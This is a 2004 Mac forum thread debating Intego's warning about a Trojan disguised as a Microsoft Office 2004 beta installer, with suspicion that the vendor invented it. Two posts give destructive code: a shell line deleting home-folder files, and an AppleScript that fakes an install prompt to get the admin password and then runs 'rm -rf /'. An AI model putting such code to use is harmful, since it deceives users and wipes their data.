[ZOM 77]

now this pisses me off,

last month intego so kindly pointed out to the world a hole in os x,
with a mock up virus that just showed how easy it was to trick us in to
opening the virus w. o knowing (it was hidden in an mp3 file)

surprisingly,
today, intego is informing us of a new virus that has just hit that mac world,

the file in question is a ms office 2004 public beta installer
(which never existed through ms as a public beta)

you double click on it, and it erases the entire contents of your user folder,
being that the user folder is the only thing that permissions allow to be erased...

the system is owned by root, or system,
and other users folders are not affected for the same reason,


it is a small application with the ms icon pasted on to it so it looks to be an installer,


i think intego created this "virus" that is only aquirable through p2p sharing or emailable,
but does not spread on its own ...
i think they created it just to make more biz for themselves,

it is claimed that a user downloaded the virus from p2p in uk,
that user told macworld uk about it,
and macworld uk contacted intego,
not norton or virex, the premier virus solutions providers for mac, but intego,

and intego twice in a row are the first to report on these problems,
what could be done about this?

bastards . . .


(from macnn.com)
Intego warns of new Mac OS X Trojan Horse
Wednesday, May 12, 2004 @ 2:05pm



Intego today announced its latest virus definitions are offering protection from a new Mac OS X Trojan Horse: AS.MW2004.Trojan: "This Trojan horse, when double-clicked, permanently deletes all the files in the current user's home folder. Intego has notified Apple, Microsoft and the CERT, and has been working in close collaboration with these companies and organizations. The AS.MW2004.Trojan is a compiled AppleScript applet, a 108 KB self-contained application, with an icon resembling an installer for Microsoft Office 2004 for Mac OS X. This AppleScript runs a Unix command that removes files, using AppleScript's ability to run such commands. The AppleScript displays no messages, dialogs or alerts. Once the user double-clicks this file, their home folder and all its contents are deleted permanently."

Intego has says it has updated its VirusBarrier X software to address this vulnerability. Intego VirusBarrier X eradicates this Trojan horse, using its virus definitions dated May 11, 2004, which are only available through the program's NetUpdate feature.

(continued at link)

http://www.macnn.com/news/24670

[CambAngst]

So let me see if I'm understanding you: Companies that discover and publicize Windows viruses and trojans, in spite of Microsoft's efforts to downplay their gaping security holes, are heroes. But, anyone who dares to warn the world about a Mac Trojan horse posing as an installer for what's likely to be the single most pirated Mac application of 2004, in spite of Apple's near-denial of the mere existence of any malicious code targeting Mac OS X, is an evil corporation?

What a load of garbage. Some Mac people are so insecure and paranoid that it's embarassing to be associated with them.

Is this a real virus? Of course not. Nobody ever claimed it was.

Is this going to spread like wildfire like most Windows worms? Of course not, but nobody ever claimed that, either.

Is this thing dangerous and worth warning people about? Absolutely. Knowledge is a better defense against viruses and trojans than all the software you can buy.

[ZOM 77]

but why would macworld uk tell intego about this first instead of virex,
being that virex is already on so many mac desktops, being included w. .mac,

if this was really an effort to avoid many users folders from being deleted,

y tell intego?

y not virex?

i think that intego is causing unnecessary problems,
just to beef up their market share . . .

and i think this is wrong of them to do.

[Silky Voice of The Gorn]

Intego is very suspect. The mp3 thing, and now this, are such idiotic and easily created script kiddie nonsense, that it hardly merits mention as true dangers as real viruses or trojans. One can only surmise that Intego is looking for publicity.

[mitchell_pgh]

Originally posted by Silky Voice of The Gorn:
Intego is very suspect. The mp3 thing, and now this, are such idiotic and easily created script kiddie nonsense, that it hardly merits mention as true dangers as real viruses or trojans. One can only surmise that Intego is looking for publicity.

I said this before, but I guess I should say it again.

You can make an OS fool proof, but not idiot proof

All apple needs to do is implement a routine that notices when more then 15+ files are about to be deleted and pop up a "are you positive you want to erase 2342342 files?"

Look for it soon in a security update near you.

[absmiths]

Originally posted by mitchell_pgh:
I said this before, but I guess I should say it again.

You can make an OS fool proof, but not idiot proof

All apple needs to do is implement a routine that notices when more then 15+ files are about to be deleted and pop up a "are you positive you want to erase 2342342 files?"

Look for it soon in a security update near you.

And then the hackers will write code that either (1) only deletes the most important files it finds (or better yet, random stuff so that it isn't even noticed), or deletes files in groups of 14 while dazzling the user with splash screens and pictures of mother boards and daughter cards . . .

Not to mention that the stupid update by Intego will be worthless once someone changes the filename or pastes an Apple package installer icon on it.

[absmiths]

Originally posted by CambAngst:
So let me see if I'm understanding you: Companies that discover and publicize Windows viruses and trojans, in spite of Microsoft's efforts to downplay their gaping security holes, are heroes. But, anyone who dares to warn the world about a Mac Trojan horse posing as an installer for what's likely to be the single most pirated Mac application of 2004, in spite of Apple's near-denial of the mere existence of any malicious code targeting Mac OS X, is an evil corporation?

Do you hear anyone questioning the intentions of Virex, McAfee, NAV (RIP) or CERT? The obvious question here is the dubious intention of an anti-virus manufacturer appearing to manufacture perceived threats and raise income.

It is interesting that some people are as fast to recoil at what they perceive as 'mac zeal' (which is almost always) as zealots are to display such zeal. Try to calm down, dude.

EDIT: I don't know what 'maz zeal' is . . .

[CatOne]

Ummm... this isn't a VIRUS.

It's trivially easy to write an application that deletes stuff from your hard drive. Call it "delete my files.app" That's not a virus, it's an application!

Now... just change the icon, steal the Microsoft office installer icon, and change the name of the application, call it "Microsoft Word Demo.app" It's still just an application! It's not a virus... if you're a user that pirated the app and you run it, it will delete files.

There's nothing about it that's a virus, it's just an executable. And I could write an app like this in 20 minutes (perhaps less), and do the same thing, it's just an executable with a tricky name.

I highly doubt Intego wrote it... and what's with the poll results? 10 people think Intego wrote it? Did you vote 10 times for your own poll?

[kcmac]

Hey. It's a stupid poll. The second choice is admitting you know who wrote it. No, I did not vote.

If it is this easy to write an application that will erase your entire home folder without a warning coming up, etc. then I hope it gets fixed.

Of course, when you use Limewire or similar apps, you are already taking a risk...

[Kristoff]

Dude, you are a RETARD

Here:

#!/bin/sh

rm ~/*.*



There. Wow. save as "retard.sh".

then run ./retard.sh

Oooooh, Ahhhh. Wooooooo. Ugh. This whole "NEW OSX TROJAN" thing is getting old.

[absmiths]

Originally posted by kcmac:
Hey. It's a stupid poll. The second choice is admitting you know who wrote it. No, I did not vote.

If it is this easy to write an application that will erase your entire home folder without a warning coming up, etc. then I hope it gets fixed.

Of course, when you use Limewire or similar apps, you are already taking a risk...

And just how is the OS supposed to determine which of any user authorized processes - which by the way create and destroy files ALL THE TIME - are malicious? The fact that a process deletes files does not make it malicious - and I for one don't want to have to answer a dialog every time a process erases a file.

The poll should have asked who thought Intego was being inscrupulous in promoting FUD to sell software - I seriously doubt anyone claims to know who really wrote this thing.

[absmiths]

Originally posted by Kristoff:
Oooooh, Ahhhh. Wooooooo. Ugh. This whole "NEW OSX TROJAN" thing is getting old.

Indeed - and it is doing the same thing here that it is doing elsewhere - causing undo concern and further muddying the concept of computer security in the minds of casual users and distracting from real issues.

[moonmonkey]

Originally posted by Kristoff:
Dude, you are a RETARD

Here:

#!/bin/sh

rm ~/*.*



There. Wow. save as "retard.sh".

then run ./retard.sh

Oooooh, Ahhhh. Wooooooo. Ugh. This whole "NEW OSX TROJAN" thing is getting old.

What does that d.....................

[ambush]

Originally posted by mitchell_pgh:
I said this before, but I guess I should say it again.

You can make an OS fool proof, but not idiot proof

All apple needs to do is implement a routine that notices when more then 15+ files are about to be deleted and pop up a "are you positive you want to erase 2342342 files?"

Look for it soon in a security update near you.

That would have to be a KEXT.

And it'd suck.
They should just have a deamon running and check which files the user opens and get a list of suspect files on apple's servers.

[Boondoggle]

I've got this cool OSX virus that I just wrote.

It has an icon like a mean looking bug and is called trashUrMac.app, but when you click on it, it works JUST LIKE adobe photoshop CS. It took a while to write it...

Email me your CC# and I"ll email you a copy for $5.

bd

[mbryda]

I've often wondered if the virus software companies fund the virus writers. If you think about it, AV software companies prey on people's fear of catching a virus/worm/trojan. It is a multi-trillion dollar industry. (All those Windows desktops)

If Windows were to not have viruses, there would be no virus software industry. So, it's in their best interests to secretly fund the writers or publicize the holes to the underground first, then M$....

Makes for a great conspiracy theory....

[Sarc]

anyone got the """"""virus""""""" yet ? I'd like to know if it's a shell script, an apple script, etc.

[Boondoggle]

I read somewhere (no link, sorry) that it had all the earmarks of an applescript.

[absmiths]

Originally posted by Sarc:
anyone got the """"""virus""""""" yet ? I'd like to know if it's a shell script, an apple script, etc.

According to Intego it is running rampant on the Gnutella network. Should be easy enough to grab it from there . . .

[Millennium]

I don't claim to know whether or not Intego wrote this, and frankly I don't care all that much. If they did then they should be charged with fraudulent practices.

But whoever wrote these two Trojans, I sincerely hope that it acts as a wake-up call to the OSX world. It's a bad thing, but it needed to happen. We've been lulled into a false sense of security by the lack of known malware; even if it's not there yet, it can and will be written. He who doesn't protect his own machine against inevitable threats is a fool, and hopefully there will be far fewer fools left in the Mac community after these.

[theolein]

Originally posted by Kristoff:
Dude, you are a RETARD

....

Developmentally Inhibited

[mbryda]

Originally posted by Millennium:
But whoever wrote these two Trojans, I sincerely hope that it acts as a wake-up call to the OSX world. It's a bad thing, but it needed to happen. We've been lulled into a false sense of security by the lack of known malware; even if it's not there yet, it can and will be written. He who doesn't protect his own machine against inevitable threats is a fool, and hopefully there will be far fewer fools left in the Mac community after these.

I'll still not run virus s/w on my Mac. Why? I'm smart enough to not open weird attatchments. And the security of UNIX is very good, so I'm not worried. Sure the S/W will be written, but will be easy to identify.

[Arkham_c]

La dee da. Here's an AppleScript "virus" that exploits stupidity:

Code:
try
	set stupid_message to "Please enter your password to install Microsoft Office 2004"
	display dialog stupid_message buttons {"OK"} default button 1
	do shell script "nohup rm -rf / " with administrator privileges	
on error error_message
	beep
	display dialog error_message buttons {"OK"} default button 1
end try

Compile, add an icon, go to town. People are stupid.

[Rev-O]

What would make you dl a "public beta" for M$ Word off of p2p instead of the M$ website? Gee, a trojan that targets porn peddlers, music swappers, and pirates. A shame.